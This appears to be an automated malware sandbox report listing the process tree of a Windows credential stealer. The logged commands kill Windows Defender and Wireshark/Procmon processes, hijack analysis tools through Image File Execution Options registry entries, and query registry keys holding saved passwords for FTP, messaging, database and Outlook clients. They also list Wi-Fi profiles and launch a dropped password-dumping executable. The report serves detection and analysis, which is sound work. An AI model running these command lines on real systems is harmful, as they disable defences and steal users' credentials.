    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\System32\Wbem\WMIC.exe] wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\FTPware\CoreFTP\Sites" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\FTPware\CoreFTP\Sites" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Adobe\Common" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Adobe\Common" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Beyluxe Messenger" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Beyluxe Messenger" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\username" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\username" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\password" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\IMVU\password" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\A.V.M.\Paltalk NG\common_settings\core\users\creds" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\A.V.M.\Paltalk NG\common_settings\core\users\creds" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Modifies service
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe -a C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json2⤵
-
C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exeC:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe -a C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\.ntusernt.ini
- C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\License.XenArmor
- C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\License.XenArmor
- C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe
- C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenAllPasswordPro.exe
- C:\Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenManager.dll
- C:\Users\Admin\AppData\Local\Temp\ahszDAmtWV5987010544251442304.json
- C:\Users\Admin\roBcX\Desktop.ini
- C:\Users\Admin\roBcX\xvPwc.class
- \Users\Admin\AppData\Local\Temp\IFHUmsSLMV1272646025045097700.xml
- \Users\Admin\AppData\Local\Temp\RuQuwHrpDe\XenManager.dll
- \Users\Admin\AppData\Local\Temp\sqlite-unknown-e6843014-4b9a-421a-9f6e-f08839b36fa6-sqlitejdbc.dll